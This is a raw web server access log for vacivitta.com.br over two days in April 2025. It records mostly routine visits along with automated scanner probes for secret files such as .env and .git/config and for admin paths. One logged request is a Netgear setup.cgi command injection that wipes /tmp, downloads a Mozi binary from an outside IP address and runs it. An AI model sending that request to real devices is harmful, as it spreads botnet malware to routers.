154.81.156.35 - - [15/Apr/2025:18:28:53 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:18:41:20 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
20.215.240.2 - - [15/Apr/2025:18:44:43 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
20.215.240.2 - - [15/Apr/2025:18:44:44 -0300] "POST / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
167.172.102.224 - - [15/Apr/2025:18:58:45 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
167.172.102.224 - - [15/Apr/2025:18:58:45 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
167.172.102.224 - - [15/Apr/2025:18:58:45 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
167.172.102.224 - - [15/Apr/2025:18:58:46 -0300] "GET /form.html HTTP/1.1" 404 - "-" "curl/8.1.2"
vacivitta.com.br:80
167.172.102.224 - - [15/Apr/2025:18:58:46 -0300] "GET /upl.php HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
167.172.102.224 - - [15/Apr/2025:18:58:46 -0300] "GET /t4 HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
167.172.102.224 - - [15/Apr/2025:18:58:47 -0300] "GET /geoip/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
167.172.102.224 - - [15/Apr/2025:18:58:47 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
167.172.102.224 - - [15/Apr/2025:18:58:47 -0300] "GET /1.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
167.172.102.224 - - [15/Apr/2025:18:58:48 -0300] "GET /systembc/password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
167.172.102.224 - - [15/Apr/2025:18:58:48 -0300] "GET /password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:19:00:13 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:19:16:30 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:19:24:59 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
173.211.106.127 - - [15/Apr/2025:19:32:54 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
173.211.106.127 - - [15/Apr/2025:19:32:54 -0300] "POST / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:19:44:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:19:45:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:20:04:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
2.58.56.157 - - [15/Apr/2025:20:24:16 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:20:34:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [15/Apr/2025:20:35:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:20:39:40 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
198.235.24.185 - - [15/Apr/2025:20:48:00 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
198.235.24.185 - - [15/Apr/2025:20:48:01 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:20:51:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
206.189.192.247 - - [15/Apr/2025:20:55:22 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
206.189.192.247 - - [15/Apr/2025:20:55:22 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
185.180.140.4 - - [15/Apr/2025:20:56:17 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
vacivitta.com.br:80
185.180.140.4 - - [15/Apr/2025:20:56:18 -0300] "GET /login.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
vacivitta.com.br:80
185.180.140.101 - - [15/Apr/2025:20:56:20 -0300] "GET /jasperserver/login.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
vacivitta.com.br:80
185.180.140.103 - - [15/Apr/2025:20:56:21 -0300] "GET /jasperserver-pro/login.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
vacivitta.com.br:80
185.180.140.101 - - [15/Apr/2025:20:56:24 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:21:02:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.20 - - [15/Apr/2025:21:04:28 -0300] "-" 408 - "-" "-"
vacivitta.com.br:80
154.81.156.20 - - [15/Apr/2025:21:04:38 -0300] "-" 408 - "-" "-"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:21:04:52 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:21:37:42 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [15/Apr/2025:21:51:22 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [15/Apr/2025:21:52:26 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
5.183.209.244 - - [15/Apr/2025:21:56:01 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
106.75.13.68 - - [15/Apr/2025:21:58:19 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
106.75.13.68 - - [15/Apr/2025:21:58:19 -0300] "GET /v1 HTTP/1.1" 404 - "-" "-"
vacivitta.com.br:80
106.75.13.68 - - [15/Apr/2025:21:58:20 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:22:03:09 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:22:08:06 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:22:10:57 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:22:14:59 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
81.17.153.250 - - [15/Apr/2025:22:19:10 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
vacivitta.com.br:80
164.90.174.133 - - [15/Apr/2025:22:20:06 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
164.90.174.133 - - [15/Apr/2025:22:20:06 -0300] "GET /odinhttpcall1744766407 HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
vacivitta.com.br:80
164.90.174.133 - - [15/Apr/2025:22:20:06 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
164.90.174.133 - - [15/Apr/2025:22:20:06 -0300] "POST /sdk HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
vacivitta.com.br:80
164.90.174.133 - - [15/Apr/2025:22:20:07 -0300] "GET /HNAP1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
vacivitta.com.br:80
164.90.174.133 - - [15/Apr/2025:22:20:07 -0300] "GET /evox/about HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
vacivitta.com.br:80
164.90.174.133 - - [15/Apr/2025:22:20:07 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
164.90.174.133 - - [15/Apr/2025:22:20:07 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
159.89.108.12 - - [15/Apr/2025:22:20:08 -0300] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
159.89.30.87 - - [15/Apr/2025:22:20:08 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
161.35.30.233 - - [15/Apr/2025:22:20:08 -0300] "\x16\x03\x01\x01$\x01" 404 - "-" "-"
vacivitta.com.br:80
159.89.103.153 - - [15/Apr/2025:22:20:08 -0300] "GET /solr/admin/info/system HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
164.92.202.225 - - [15/Apr/2025:22:20:08 -0300] "GET /v2/_catalog HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
159.65.124.125 - - [15/Apr/2025:22:20:08 -0300] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
207.154.239.36 - - [15/Apr/2025:22:20:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
vacivitta.com.br:80
159.89.30.87 - - [15/Apr/2025:22:20:08 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
159.89.103.153 - - [15/Apr/2025:22:20:08 -0300] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:22:30:21 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:04 -0300] "GET /robots.txt HTTP/1.1" 404 - "-" "python-requests/2.31.0"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:04 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:04 -0300] "GET /assets/index-Cg8Dlh-J.css HTTP/1.1" 200 1818 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:04 -0300] "GET /assets/index-DogtGhmX.js HTTP/1.1" 200 839022 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:05 -0300] "GET /logo.png HTTP/1.1" 200 25613 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:05 -0300] "GET /2.png HTTP/1.1" 200 1052379 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:05 -0300] "GET /vaci.jpg HTTP/1.1" 200 155283 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:05 -0300] "GET /recomenda.png HTTP/1.1" 200 262901 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:05 -0300] "GET /amanda.png HTTP/1.1" 200 1537884 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:05 -0300] "GET /1.png HTTP/1.1" 200 1041468 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:06 -0300] "GET /3.png HTTP/1.1" 200 1055246 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:05 -0300] "GET /mapa.png HTTP/1.1" 200 1787231 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:06 -0300] "GET /homePage.png HTTP/1.1" 200 1495045 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:06 -0300] "GET /homePage2.png HTTP/1.1" 200 227246 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:06 -0300] "GET /4.png HTTP/1.1" 200 1067791 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:06 -0300] "GET /walp.png HTTP/1.1" 200 26312 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:06 -0300] "GET /fts3.png HTTP/1.1" 200 798280 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:06 -0300] "GET /fts2.png HTTP/1.1" 200 2539592 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:06 -0300] "GET /fts1.png HTTP/1.1" 200 2704287 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:06 -0300] "GET /video.mp4 HTTP/1.1" 206 24879530 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:06 -0300] "GET /video.mp4 HTTP/1.1" 206 1941930 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:06 -0300] "GET /video.mp4 HTTP/1.1" 206 24813994 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
185.117.225.112 - - [15/Apr/2025:22:42:06 -0300] "GET /video.mp4 HTTP/1.1" 206 1876394 "http://newmail.vacivitta.com.br/" "Mozilla/5.0 (compatible; BitSightBot/1.0)"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:22:55:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:23:10:14 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
195.184.76.9 - - [15/Apr/2025:23:20:07 -0300] "\x16\x03\x03\x01\xa8\x01" 404 - "-" "-"
vacivitta.com.br:80
195.184.76.233 - - [15/Apr/2025:23:20:10 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
vacivitta.com.br:80
34.140.100.231 - - [15/Apr/2025:23:22:39 -0300] "GET / HTTP/1.1" 200 488 "-" "python-requests/2.32.3"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:23:24:06 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:23:24:22 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
180.149.126.4 - - [15/Apr/2025:23:28:25 -0300] "GET /c/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
vacivitta.com.br:80
195.184.76.9 - - [15/Apr/2025:23:31:06 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:23:34:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:23:51:40 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [16/Apr/2025:00:25:00 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [16/Apr/2025:00:25:10 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
103.197.113.39 - - [16/Apr/2025:00:40:27 -0300] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.197.113.39:50066/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [16/Apr/2025:00:46:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [16/Apr/2025:00:57:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [16/Apr/2025:00:59:01 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
31.104.42.174 - - [16/Apr/2025:01:17:03 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
185.218.86.4 - - [16/Apr/2025:01:24:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [16/Apr/2025:01:31:19 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [16/Apr/2025:01:32:30 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [16/Apr/2025:01:51:29 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
138.197.105.217 - - [16/Apr/2025:02:07:01 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
138.197.105.217 - - [16/Apr/2025:02:07:01 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
138.197.105.217 - - [16/Apr/2025:02:07:01 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
138.197.105.217 - - [16/Apr/2025:02:07:01 -0300] "GET /form.html HTTP/1.1" 404 - "-" "curl/8.1.2"
vacivitta.com.br:80
138.197.105.217 - - [16/Apr/2025:02:07:01 -0300] "GET /upl.php HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
138.197.105.217 - - [16/Apr/2025:02:07:01 -0300] "GET /t4 HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
138.197.105.217 - - [16/Apr/2025:02:07:02 -0300] "GET /geoip/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
138.197.105.217 - - [16/Apr/2025:02:07:02 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
138.197.105.217 - - [16/Apr/2025:02:07:02 -0300] "GET /1.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
138.197.105.217 - - [16/Apr/2025:02:07:02 -0300] "GET /systembc/password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
138.197.105.217 - - [16/Apr/2025:02:07:02 -0300] "GET /password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
